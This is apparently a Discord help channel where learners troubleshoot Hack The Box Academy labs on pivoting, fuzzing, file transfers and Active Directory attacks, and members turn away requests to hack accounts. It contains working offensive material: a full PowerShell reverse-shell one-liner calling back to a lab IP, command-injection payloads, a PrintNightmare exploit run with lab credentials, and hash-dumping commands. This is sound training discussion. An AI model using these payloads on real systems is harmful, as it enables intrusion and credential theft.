#modules

oh, so having admin priv doesn't necessarily mean local auth?

Yeah, it doesn't. Domain users, as well as, local users, can be part of the local Administrators group.

The --local-auth option is used when you wish to authenticate using a local user account.

oh ty

where can i find the flag if ive already downloaded the file with the flag in it?

open the downloaded file

there is no need to download the file though, just curl it without the -o option

but i cant find the file

the flags in the file though

the file should be in the your current directory

where?

just curl the ip

curl ip

just like that

i got the flag no problem

wdym curl ip

like just the ip?

like you did in the example

just remove the -o

yeah i did but the flag is in file

its not here

bro remove the -o

it shouldnt be in any file

well then whats the flag? theres a bunch of stuff here!!

i remove the -o

HTB{blahblah}

*removed

something like that

yeah no not there

you removed the -o from here?

yeah

it shows the sites info

but not the flag

just show a screenshot of what you're trying and getting...

too hard

to take screenshot

are you on pwnbox or linux?

good luck with everything on HTB then

pwnbox

?

how dont u see the flag

i dont it only shows website info

what website info?

i copied the command from you and removed the -o

noww i got it

tysm

i gtg now cya

hi can you help me?
i doing the introduction to bash script
and the site dont accept my answer
why do this?

Because your answer may be wrong

Oh thanks 🥲 i dont thing that

think*

I downloaded firefox profiles from HTB vm to my machine in ~/.mozilla/firefox directory but when I run firefox_decrypt.py, it doesn't show those profiles

in this question i can the right answer (index = 1) and i can run the code but i dont know what can write in the submit container

echo $domains[1]

You'll need to run it on the target i don't recall transferring anything back to my machine

But target machine doesn't have python version that firefox_decrypt requires

i don't recall running into version issues ¯_(ツ)_/¯

i cant really upload the photo but the module of command injection
i use payloads in the sections but none work

<@&861185840277487616>

ip=127.0.0.1%0als

this do the ls , when i want to add the -la its invalid input

any suggestions how to add both ??

same in #cpts

Cleaned up.

+-la at the end

So it looks like ls+-la

thx but not like that i figured it out its %0a{ls,-la}

That's another way of doing it

yea the section was not clear about that but it was ok 😭

It takes some mild knowledge of linux

Command injections is assuming some level of knowledge of commands

Anyone help on identifying ssrf how to get the flag ?

Not sure if this is the right channel...but just to confirm, HTB Academy is not having any Black Friday sales right?

Yes, that is correct

sad times

That was to be expected. I haven't seen any Black Friday offers from the HTB Academy yet.

?

do you have a question?

This isnt hacker for hire

But how big? 189cm big?

Ohh

Please

No. If you lost access to an account, contact the support of that website.

We can not help you. Hacking is illegal

Ok

Yup explore an internal vulnerability to find an ssrf exploit and submit the flag like thay

What?

awesome

Then save money

You know how to do it?

yes

Anyone have any advice for part 2 of the skills assessment in the Login Brutal Forcing module. I can't seem to connect to FTP

Any clue on completing ut

I am stuck in "information gathering - web edition" module "web archives"
"Going back to november 1998 on google.com, what adress hosted the non-alpha "google search engine prototype" of google? I tried http://google.stanford.edu, http://stanford.edu, https://google.stanford.edu, https://stanford.edu
But are all wrong

follow the methods discussed in the module

yes

Can you chrck your dm ?

no

The only method is using waybackmachine? Wich goes to http://google.stanford.edu

Can you give any Clue to solving it

without context?

what does the hint say?

No the question was exploit ssrf vul to identify an internal web app access it and obtain flag i had ran a port scan and found 8000 port to be up but closed any clue how to cnnect to it Nd get flG

Well if it's ssrf, use your imagination

There is no hint button, but it says "eg. http://google.com", wich is wrong... i just found correct anwser. It schould be "eg. http://google.com/"

port 8000 is open 😉

Its missing the /

same thing

Ah but i dont see any way to access it

To get the flag

have you tried sending a request to that port?

Yup via burp but getting an error

lets see the request

If it's not a t0 module i suggest taking this to DM to avoid spoilers

great idea

@limpid hemlock you can dm @fathom pendant for this

I haven't done this modue

And don't volunteer someone else to assist

same

So no help i guess

Just be patient for assistance, there's no dedicated support for skill issues

Anyone done the File Uploads module, need some help with exiftool. the command is telling me that it doesn't support "writing of SVG images" Does anyone suggestions on how to proceed? Do I need to open it in a hex editor?

(I realize that's a "skill issue" question)

Italian?

inglese

You don't necessarily need the exiftool to do anything in this module

It's just used as an example

Ahh. Thanks.

English #rules

ok

This is an English only server. You might be able to make a post in #1225791307256168448 you might need to follow #welcome to post there

Also i suggest Deepl for better translations

https://www.deepl.com/en/translator

thanks

Deepl can be funny

😅

what you mean?

I've had customers use it for translating product data. And Deepl started translating brand names

hahahha, sounds like make direct translations

hi guys

so im trying to complete a File transfering
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer

i uploaded the zip file on windows and found a flag, but when im entering it, its says thats flag is wrong. Why so?

you are supposed to run "hasher upload_win.txt" and the output of that console command is the flag, not the content of the file

ok, i make it, and its not worknig

Anyone having issues with loging into the remote windows machine in any of the hackthe box academy modules:

──╼ [★]$ xfreerdp /v:10.129.178.9 /u:htb-student /p:HTB_@cademy_stdnt! /dynamic-resolution
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - creating directory /home/htb-ac-767577/.config/freerdp
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - creating directory [/home/htb-ac-767577/.config/freerdp/certs]
[12:26:56:021] [8629:8630] [INFO][com.freerdp.crypto] - created directory [/home/htb-ac-767577/.config/freerdp/server]
[12:26:56:162] [8629:8630] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]
┌─[eu-academy-2]─[10.10.14.97]─[htb-ac-767577@htb-yfpn6f0kqo]─[~]
└──╼ [★]$

https://academy.hackthebox.com/module/67/section/912

Put your password in single quotes

Also tried that:

xfreerdp /v:10.129.178.9 /u:htb-student /p:'HTB_@cademy_stdnt!' /dynamic-resolution
[12:30:01:792] [13373:13374] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

pinged the ip address too

You can also try setting /tls-seclevel:0

And /cert-ignore

I don’t even know how to use exfiltool, I did the one you mentioned manually

Just follow the xxe attack instruction in that module to read the file and you’re done

thanks I tried rdesktop and that worked

Good 🙂

sorry

do u know why my flag is not counting?

.

Make sure there’s no spaces at the end

there isnttt😭

Hi. Have you passed Parameter Logic Bugs? If yes, could you give me a hint in submodule PoC and Patching - Null Safety? I'm trying to find a way how to disclosure id of the user. I've checked all functions where are used req.body and req.params + returned id. There are not so many places which return identificator, but in all cases I didn't get it. I tried to find any NoSQLi but it seems that it's not a way for decision.

verify /etc/hosts has the right ip

ahh yes thank you

why am i getting 403 :/

for some im getting 200 and some im getting 403

403 means forbidden

aka you don't have permissions to view it

is that supposed to be there?

no idea, you didn't mention the module or section

skills assessment web fuzzing

thats wrong answer btw ^ so not a spoiler 😅

I have quite a few 403s

but I dont think its asking for 403

which module

web fuzzing isnt a module..

with ffuf

You need to use the proper port

attacking web applications with ffuf?

yeah

probably

Wtf is up wit the stupid snort skil assessment

it does actually spoil the vhost which is an answer

it dies 10 seconds after I SSH

sorry yes attacking with ffuf

also I wasnt using the dots between the specified extensions

careful of spoilers

sorry

ahh let me try with port

it looks like you havent ran hasher.

stupid question but I'm trying to do the first task on intercepting web requests and no matter how much i url encode it. i cant get it to work

legit every other command works but that

That question does not requires encoding the payload. Do you use Burpsuite?

Yes I'm using burp suite

i even verified that the flag was there

||ip=;cat flag.txt;||

This was my payload and it didnt work

maybe try leave a valid octet in a beggining before the ';'

what do you mean valid octet?

the ping command expects you to complete an IP - like 127.0.0.X
the X is the last octet.

so the server runs 'ping 127.0.0.X;cat flag.txt'

hey, did you find answer to that question?

Yes I finished that

could you tell me how do i get "foothold" for that

||ip=3;cat flag.txt||

i mean i dont know filename, directory etc

nope still nothing

Iframe on 8080

thanks

yo

Done

for anyone trying it, ||cat doesnt work but head does||

I sent you DM

on the Pass the Ticket from Windows section of password attacks, it won't let me log in via xfreerdp to the windows client:

┌─[us-academy-1]─[10.10.14.239]─[htb-ac-605555@htb-fdebtjpfru]─[~]
└──╼ [★]$ xfreerdp /v:10.129.5.38 /u:Administrator /p:AnotherC0mpl3xP4$$
[16:52:34:048] [9928:9929] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[16:52:34:048] [9928:9929] [WARN][com.freerdp.crypto] - CN = MS01.inlanefreight.htb
[16:52:34:249] [9928:9929] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[16:52:34:250] [9928:9929] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

what should I do about this?

idk

ok hold on

that wasn't helpfuul

why are you responding with "idk?"

if you don't know why are you saying anything at all?

this is a Discord channel where we aim to get advice from people who either know or have a good idea of how they might be able to help

idk buddy

when I reset the target or pwnbox it doesn't do anything

well, your password contains special characters

ok should it be in quotes?

operating systems will process certain special characters in other ways, it's always best to wrap it in quotes so it's a literal string

you can try echoing the word without in the terminal and see if it echos back correctly

I did that and it didn't work but now I'm restarting target and trying again with quotes

will try double quotes then single

single quotes for literal string

ok

https://stackoverflow.com/questions/6697753/difference-between-single-and-double-quotes-in-bash

thanks single quotes worked

ok solved first two questions on my own

I'll let you know if I have any more issues

I solved all three questions on my own. I'm gonna do the optional challenge tomorrow after I take notes on the section again on my own.

that way I can make sure I really understand it before I move onto next piece of material

not what this discord is about

My bad

🤔
https://academy.hackthebox.com/module/158/section/1432

Target(s): 10.129.87.54 (ACADEMY-PIVOTING-LINUXPIV)

after doing:
$ sudo sshuttle -r ubuntu@10.129.87.54 172.16.5.0/23 -v

i tried to nmap the windows box with:
nmap -v -sV -p3389 172.16.5.19 -A -Pn

i cant find the open port but i noticed that the traceroute doen't show tun0 nor ubuntu pivot host,
it shows my VM hop and my home router hop

is this normal?
any idea of how can i approach this issue?

nvm, xfreerdp works

ok -sT -.-

couldsomeone help me do a command

And what command would that be

generating

every single possible combination for a 6 digit number

that my friend would be a script, not a command

oh

sry i dont know much

and i wanted those combinations to be tested at superhuman speeds on a certain website

which module?

the broken auth module goes over the command

huh

idk what those are

this channel is for htb's academy platform

are you trying to brute-force a website on the internet?

https://tenor.com/view/isnt-that-illegal-leon-geller-leon-the-pig-farmer-isnt-that-bad-against-the-law-gif-24753976

wat that

yeah i don't really see many roe's allowing brute forcing

where are you trying to do this exactly?

on a website

Rooobooox

yeah which website

i wanted to see if it would work on myself

riot games

lol

no one here can help you with that. not worth going to prison for riot games

wdym

im doing it on myself

I’m quite sure if they find out, your account t will be banned

it's illegal buddy

i dont get it

why illegal

if my account

reach out to riot support if you need into your account and you lost access, no one here can help you. anyone private messaging you saying they can is lying and scamming you.

oh

It’s not your account most likely. You’re allowed to create an account and use it, but the account is still from the company where you created it

ohh

that's true too

but what if my account was compromised

and the shitters down in riot games cant answer your email

then reach out to riot no one here can help you, no riot staff is here

hypoteticaly

😆

again no one's going to prison to try to get "your" account

it is mine

someone hacked me and changed my info

well i'm not going to keep going in circles

i have another question

that is legal

ask in #general unless it's related to academy

aw man

you probably know how to

it doesnt let me talk there

you have to read and follow the instructions in #rules and #welcome

it being atistic

no work

It’s three easy steps

im brainded

easy for you is hell for me

But yeah, this isn’t hacker for hire. If that’s what you’re after, this isn’t the server for you

inhales in dad "Hello braindead"

i was just wondering

how to get kali linux

You go to the website and download it

https://tenor.com/view/bruh-meme-gif-26978290

it doesnt work

go to youtube, watch a tootoorial

i'll leave it on your moms nightstand tonight for you in the morning

i already did

plss

I'm just gonna say: if you can't figure out how to get it, you probably won't be able to figure out how to use it

i have picture

its notworking

my guy, this channel is for the hackthebox academy playform you'll need to ask in another channel

This isn’t the channel to help you with setting up a vm

but general no work

Read and follow the three steps in #welcome

i already try

Try again.

what do i type in this

/ identify (account_identifier)

Read the steps again

Lol I think he doesn’t even know what hackthebox is to create an account in order to accomplish the steps

He figured it out now

Hope so

he did

They’re talking in #general now

i wonder how long he lasts

in pivoting and tunnelling section, RDP AND SOCKS tunnelling with SocksOverRDP not able to execute SocksOverRDPPlugin.dll even though defender is off.

running as admin?

Yes cmd as admin

Make sure real-time protection is off

.

It’s off.

Oops. Typo I meant SocksOverRDPServer.exe

redownload it , unzip the file , cd into SockOverRDP-x64 and run : regsvr32.exe SocksOverRDP-Plugin.dll

Yes this has worked but wasn’t able to run Server.exe with admin privileges

someone knows how can I cheat using lockdown browser in a classroom?

No

Ask your teacher

you can dm me if you want

noticing a trend here...

seems half of all people who join just want something hacked...

Yeah. Comes in waves

in the pivoting module, "Socat Redirection with a Reverse Shell" section, how can I run the payload on the windows pivot target?

there's socat for windows if you google it

no I mean how do I get command execution on the windows machine?

How to transfer the payload there in the first place

there are several ways to transfer files.. socat uses ssh so i'd probably use scp

did you complete the file transfer module?

scp on windows huh

on windows i like to rdp

Are you saying there is an scp server running on the windows target waiting for connections?

no

I am not sure you are getting what I am saying

I can't bro it's on a different network

sure you can, in my notes i'm using rdp

rdp from the ubuntu pivot machine?

tunneling through it i believe

if we need a tunnel already setup then what's the point of socat redirection

it explains in the module, you can use it as a redirector.. you can use it to establish rdp, or whatever you want

I believe it's actually the opposite, the module assumes you already got rdp connection to the target and just still need cli for your tools

hyy anyone doing ctf? may i join u guys . plz

#1225791307256168448 <—

Module: Attacking common services.
Section: EASY LAB.
You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.
i tried various bruteforcing methods, nothing has worked out so far, during mysql bruteforcing `[ERROR] Host '10.10.14.60' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts' i get this error.

any hint would be helpful

Module: Shells & Payloads
Section: Reverse Shells
When I run powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.25',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" on target machine I get so many syntax errors. I don't know why because it is same payload as in the section

Also, when I try to disable AV, it says that I don't have permission but in section, they successfully disabled it with normal user

Run this in command prompt

Thanks, it works now

Common practice is to base64 encode the payload using revshells.com, It might work

It didn't work because I ran it in powershell instead of cmd

encode the command, then you can run it in powershell

Information Gathering - Web Edition (Virtual hosts)
vHosts needed for these questions:
inlanefreight.htb
cant enumerate using domain (inlanefreight.htb)
Things i did already

adding ip and domain to entry file

Did you add the port ? while enumeration

It will work ,the password attacks module teaches that

anyone know if there is something going on with the Academy-Login Brute Forcing-Web Services box? I am unable to ssh in, it rejects the cert

have you chmod 600?

<@&861185840277487616>

<@&861185840277487616>

I refreshed the IP, no luck. But tried with my own device and worked

lmao

yes sir its not working with the domain

you need to disable "Allow external apps" settings @low girder , but maybe this needs to come from a admin like @surreal rain

admin to the rescue

wtf

I just blocked them

we need @compact patrol to boot him

you can't lmao a stupid feature of discord lol, this guy saw a NTTS vid and thought he was cool

thanks, will get this done!

Anyone know why gobuster is throwing this error

Error: unknown shorthand flag: 'x' in -x```

And this gobuster vhost -u http://inlanefreight.htb:35914/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --append-domain -s 157:157 Error: unknown shorthand flag: 's' in -s

It's acting like it doesn't know those flags

I need to filter a lot of false positives for the web fuzzing module

Also this is failing
gobuster dns -d http://inlanefreight.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Unable to validate base domain: http://inlanefreight.htb (lookup http://inlanefreight.htb: no such host)

Thanks

Should be resolved now.

ayee nice, as to why discord silently rolls out this feature and enables the permission by default for the everyone role is beyond me lol

Because developers want people to use their shiny new feature. 🤷‍♀️ I'm more annoyed that it appears to evade automod and that there isn't a clear option to expel a bot once it's being used. You can't "ban" it for example.

yep because the bot isn't in the server, its a user calling the bot externally but it obfuscate its response by reacting to itself, so you wouldn't see the user who triggered it, but you could still see which user triggered that command under 'Trigger Activity' of the message

Right. I get the technical reasons why. It's just an irritating setup.

Dm

Guys, I need help with this question:
How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
This is the command I am running to get the results:

ss -tuln4 | grep 'LISTEN' | grep -v '127.0.0.1' | wc -l

Output: 8
But the module is saying its incorrect...

tb-student@nixfund:~$ ss -tuln4 | grep 'LISTEN' | grep -v '127.0.0.1'
tcp    LISTEN   0        50                 0.0.0.0:139           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:110           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:143           0.0.0.0:*     
tcp    LISTEN   0        128          127.0.0.53%lo:53            0.0.0.0:*     
tcp    LISTEN   0        128                0.0.0.0:22            0.0.0.0:*     
tcp    LISTEN   0        50                 0.0.0.0:445           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:993           0.0.0.0:*     
tcp    LISTEN   0        100                0.0.0.0:995           0.0.0.0:*

This is clearly 8 tcp listening...

I remember using that exact same command and being very annoyed at that question

127.0.0.54%lo:53 still counts as localhost

Why?

blame the people who chose our ip addresses
localhost is a range from 127.0.0.0-127.255.255.255

guys i am stuck on Firewall and IDS/IPS Evasion - Easy lab. Any hints?

"Using GoBuster against inlanefreight.com to fuzz for subdomains using the subdomains-top1million-5000.txt wordlist, which subdomain starts with the prefix "su"?"

According to gobuster there isn't one:

Found: ns1.inlanefreight.com
Found: ns2.inlanefreight.com
Found: blog.inlanefreight.com
Found: ns3.inlanefreight.com
Found: my.inlanefreight.com
Found: customer.inlanefreight.com```

I ran it 3 times

time to try larger wordlists ig

Make sure that you really should scan ‘com’ and not ‘htb’.

I'm using the one they want you to use. subdomains-top1million-5000.txt

gobuster dns -d inlanefreight.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

try using vhost mode instead?

If rate limiting is used, this is not a good idea 😉

The question is confusing it says subdomains and vhost

Using GoBuster against inlanefreight.com to fuzz for subdomains using the subdomains-top1million-5000.txt wordlist, which subdomain starts with the prefix "su"? Respond with the full vhost, eg web.inlanefreight.com.

com or htb

So you want subdomain or vhost?

It's the .com question

It's found using the subdomains-top1million-20000.txt wordlist. So the question is worded wrong.

#1234357888114364508

I think the asking for vhost part is also incorrect

You should also find it with the list of 5000 entries

i don't want to use the web-based Pwnbox , can i install vpn or something to my kali vm ?

odd grep'ing the 5000 .txt returns the subdomain but gobuster failed 3 times to find that subdomain when told to use the 5000.txt file

You should then be able to find the answer with this command

odd, it failed 3 times

But then the 20000 .txt worked for some reason. But I confirmed the word is in the shorter wordlist. So I don't know the issue

I can send you a DM to show you that GoBuster does exactly what it is supposed to do

is it possible ?

yes

yes, just use the VPN

how

https://academy.hackthebox.com/vpn

I got a screenshot of it failing too. Is gobuster just unreliable?

Maybe I should just use ffuf

feroxbuster where it's at

I don't know, I've never had any problems with it.

Thank you so much! I was struggling with my crappy internet

However, if your internet connection is weak, you are better off using the PwnBox.

hell nah 💀

can someone tell me what is wrong? im trying to brute force vhost from an ip

you can't get subdomains from an ip

so what i should do?

#modules message

i was using worng arguments

the question is asking for subdomains not directories

7

It's literally told in the engagement

And yes

Also #cwes

I used netstat -l | wc -l but the number was incorrect

as I said in general:

netstat lists out ipv6 (see not ipv4 part question)
and localhost (see not localhost part of question)

I thought it said it needs everything, not ipv4 and localhost only

That would be something like netstat -lt | wc -l then

Wait not t

-l4

ss -4 lists ipv4 but not sure how its done on netstat

it should be the same

Im gonna reach my pc rq

i treid 11000 and only found 5 sub domains

crazy

@green minnow

This was the exact same thing that happened to me

yeah now I'm asking how you fixed it

how am i suppose to find the sub-domains

I just ran a different bigger wordlist. But the subdomain IS actually in 5000.txt

gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

So two different people have had gobuster fail to find that subdomain around the same time

The question for inlanefreight.com should be done in dns mode

Guys, I am getting started with the basics and I am taking on the operating system fundamentals path and in the linux fundamentals module, section on system information there are two questions that dont make sense. I need help understanding.

01 - What is the path to the htb-student's mail?
02 - Which shell is specified for the htb-student user?

I was able to manage the rest, but these ones are not clear, any help please? Thanks!

but that too doesnt seem to be working

Try using the top1million-20000.txt thats the one I used

okey ill try

gotta find the env var for mail and the shell in passwd

what about the ip?

for this one you need to use the vhost mode

arent i suppose to run command on that instead of inlanefreight.com

got nothing on that

its confusing, im at this for 1-2hr

It's two different questions

also you can't enumerate subdomains with ip

Top one is vhost fuzzing on .htb. Second is subdomain fuzzing on .com

Although it doesn't help they also use the word vhost in the second question

Information Gathering - Web Edition -> Virtual Hosts module

Use vhost enumeration i.e. -H "HOST: FUZZ.inlanefreight.htb"

okey thanks ill try that

Ffuf

You know what, I thought about that, just thought it wasn't the actual thing, guess I should act on curiosity next time... Thanks really appreciate, you're a life saver!

https://tenor.com/view/patrick-star-no-this-is-patrick-spongebob-angry-mad-gif-9319809

I'm not "a life saver!" ^

Please do not post solutions

https://tenor.com/view/ouch-gif-12136515515962044163

Yeah, didnt work

I tried increasing/decreasing for extra lines from netstat still no work

what command did you use?

Commands

netstat -l4 | wc -l

read the last part of the question again

you're missing some key filtering

As i understood

It needs: ipv4 and localhost

I think my problem is more with english lol

Or

No or

idk question is weird, just get rid of the localhosts

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

not localhost

IPv4 only
treat em as separate

also for question 3 on that same module here's your hint:

find things inside single ' and double " quotes

I did -4 , which means ipv4 only

Let me try again

netstat -tuln4 | grep "LISTEN" | grep -v '127.0.0' | wc -l

@leaden island this ^

Thats a lot of filtering lol

I need to know whats going on

yeah... the sad part is it really isn't

T for tcp

U for udp

4 for ipv4

L for listen

N for hmm not sure

numeric only

basically don't follow domains

Ooooooo

Didnt work

Okay i decremented 1 and it worked

remove 1 line for the info stuff ig

Yeah

thank yall very much

Ive been stuck on this for a day literally

read the 3rd question

Use curl from your pwnbox to obtain the source code of the 'url' and filter unique paths of that domain

Yep, cried so hard on that one

This should be easier

I just used a solution on the forums for it

¯_(ツ)_/¯

💀

here's your help for it before I go to sleep (cos I can guarantee you ain't gettin it also so you don't need the forum)
||curl https://www.inlanefreight.com > temp.txt && cat temp.txt | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep www.inlanefreight.com | sort -u | wc -l ||

there's an easier way to do this but REGEX is the next module so...

said regex:

||curl https://www.inlanefreight.com | grep -Eo "www.inlanefreight.com[^'\"]* | sort -u | wc -l"||

It requires some HTML knowledge and such to properly filter

No way im getting this LOOOL

I just used a forum command for it, one of them is well explained

Hey guys i am stuck on Firewall and IDS/IPS evasion - hard lab. Any tips?

'Linux fundemental' HTB says..

udp scan takes ages

It's still a fundamental

Reset your vm/connection and try again, it shouldn't take too long

At the same time i appreciate it being hard

It rly teaches u fundemental

It's surface level knowledge

I am scanning all the ports it still shouldnt be taking long?

Yeah it shouldn't

Im missing a lot here

had to find the regex version to understand the version the module expects you to use

Hmm I see, thank you.

edging on not very surface knowledge

Google isn't your enemy

Heck even chatgpt/AI isn't your enemy for explaining things

Or a tool like explainshell if you find a command online

ahh yes chat ji-pi-ty, the one stop shop to anything text based

Don't expect AI to craft you a functioning one liner

But it can explain things (that are documented)

It is still taking a while, the command I am executing is sudo nmap <IP> -sU -T4 -n -Pn —disable-arp-ping -p-

anything wrong with the command?

im stuck at this for hrs! can anyone help me enumerate vhost using gobuster

Also, why not use a Stealth scan instead

wouldnt it take ages

No

alr let me see

Because you need a domain to append

--append-domain does nothing if you don't have a domain to tell it

where to look for domain, domian given is inlanefreight.htb but that does not exist and ip wouldnt work

• vhosts needed

There's a --domain flag iirc or -d

yeah but what should i put in that

that flag is for dns mode?

For vhost

Maybe do --help for it to figure out the flag

i always use ffuf ¯_(ツ)_/¯

Hi All, I'm currently attempting the "Bleeding Edge Vulnerabilities" of "Active Directory Enumeration & Attacks", I've confirmed the target is vulnerable to PrintNightmare, I am then attempting to create the msfvenom payload with the syntax provided within the module, when I get the following: "-bash: backupscript.dll: Permission denied", I've tried running this with sudo on the attack host, has anyone else encountered this? Done a quick search for 'backupscript.dll', and I can't see any historic comments/questions in here pertaining to this exactly...

have you tried this?

yes

got no found

isnt this what you tried?

Hello, in the "ICMP Tunneling with SOCKS" section in pivoting module, I need to build ptunnel-ng but the glibc on my host is 2-3.6 and the one on the target is 2-3.1, what's a wordaround?

fuzz against x.inlanefreight.htb

So managed to work around this by creating the msfvenom payload on my local instance of Kali, and then transferring the .dll to the attackbox using python http.server... now when I try and run the CVE.py, I'm getting another error:
┌─[htb-student@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ $sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\172.16.5.225\CompData\backupscript.dll'
[] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing ??\UNC\172.16.5.225\CompData\backupscript.dll
[*] Try 1...
Traceback (most recent call last):
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 188, in <module>
main(dce, pDriverPath, options.share)
File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 636, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20211013.152215.3fe2d73a-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.

There's always something with these modules....

i think this is wrong im getting too much output to make sense of

seems like ??\UNC\172.16.5.225\CompData\backupscript.dll isnt accessible from the target

confirm you transferred the dll to that path

anyone know?

filter out negatives

compile statically on your host?

still too much

Didnt really understand the point in Catching Files over HTTP/S under File Transfers
What are they talking about? Setup an Nginx on the targeted network?

im getting 200 for everything

you can filter by more than 1 size

how to do so

try -fs 10918,116

ok

problem is the tool uses it's own script to build it's not just a simple gcc

thank you so much

open the script and then append -static to the script

the line

yes, when in an isolated network (air-gapped enviroment)

#!/bin/bash

set -x

OLD_WD="$(pwd)"
NEW_WD="$(dirname ${0})"

cd "${NEW_WD}"

if ! autoreconf -fi; then
    aclocal
    autoheader
    automake --force-missing --add-missing
    autoconf
fi

cd "${OLD_WD}"

"${NEW_WD}/configure" $@ && make clean && make -j${BUILDJOBS:-4} all

aight so chat gave me sth gonna try it

What do you mean?
It's not stated there that it's meant for an air-gapped networks...?

Or it's just stating another way to setup a webserver?

you're right
im stating that its an obvious use case

Just dont understand the point of this module

yeah i use chatgpt for research at least for hour a day

I uploaded the backupscript.dll to "/home/htb-student", then used the following command to create the share "sudo smbserver.py -smb2support CompData /home/htb-student/backupscript.dll", so I honestly have no idea why the share isn't accessible...

its awsome

espically in computer architecture things

Thought to myself, that I must been missing something
Because it seems a bit useless if I'm being honest

shares dont work that way you're supposed to provide a directory as the share root

not a file

its not

Thanks for the static idea @lusty thicket , if anyone wondering, just change the last line like this

"${NEW_WD}/configure" --enable-static --disable-shared CFLAGS="-static" LDFLAGS="-static" "$@" && make clean && make -j${BUILDJOBS:-4} all

wow.... thank you, that worked, appreciate that alot!

awesome!

wait lol there was a even a guide on how to build a static binary in the section but I didn't pay attention lol

I didn't even realize what static meant at that point

but if it works it works so whatever

can someone explain to me what does this question is asking me to
ik theres smt in the script.js

https://academy.hackthebox.com/module/35/section/247

what does the question say

File Upload Attacks - Skills Assessment
Hello guys, I need some helps here for the file upload attacks module - final skill assessment. I've been successfully got the upload.php source code, and got the uploaded file directory is "./user_feedback_submissions/", I've changed filename as per requirement "241130_image.jpg". After upload this file, I still cannot reach the uploaded file in the target directory: "http://83.136.254.158:53442/contact/user_feedback_submissions/241130_image.jpg" It returns a 404 not found page. So, I cannot get a POST request in BuipSuite and cannot move forward. Could someone help me to check and find the problems? Thanks!

This RDP Tunneling double pivoting module was real rough

nice bg

Anyone has completed the Active Directory Trust Attacks? I'm in the skill test and the very last question, please reply to this message I will DM you!

how to fingerprint vhost using nikto?

Yo guys, I am currently doing the Password Attacks module, and there is a section where we need to get a NTDS.dit file, when I transfer this file to my attackmachine, how can I get the hashes of this file, what command can I use?

the module explains this

please, read it again

It is by using the secretsdump tool?

is it?

impacket-secretsdump -sam /path/to/sam.save -system /path/to/system.save LOCAL

use info from current section and SAM section to retrieve the nessecary files

Oh, thank you!

Hey there, I'm currently doing the "Introduction to Threat Hunting & Hunting With Elastic" , I feel completely lost on the thought process of how to look for the correct Event.code ID and narrow my searches, how can I get better at determining the proper windows event ID or Sysmon ID ?

There should be a list of event IDs
1 : Process Create
2 : Process modifed time stamp
3 : Network Con
etc.

From the module itself you mean ?

yea

i am using gtfobins to downlad fileusing openssl and in the section we have to spun a server have a self signed cert when i am connecting to the server there is an error for not trusting that self sign cert

nvm

I was doing the skill assessment for example and I found the #1 pretty easely, fine, however the hunt #2 and specially the #3 Im like "how the hell am I supposed to know that I needed to use this event.code ID ?

@rustic sage I see what you mean but still

ur on the skills assesment

Yea, Introduction to Threat Hunting & Hunting With Elastic - Skill Assessment

sysmon only has 30 or so event codes and they are usually pretty descriptive. so if sysmon is available just open https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon and check each of them

how can i get fingerprints of vhost sub-domains

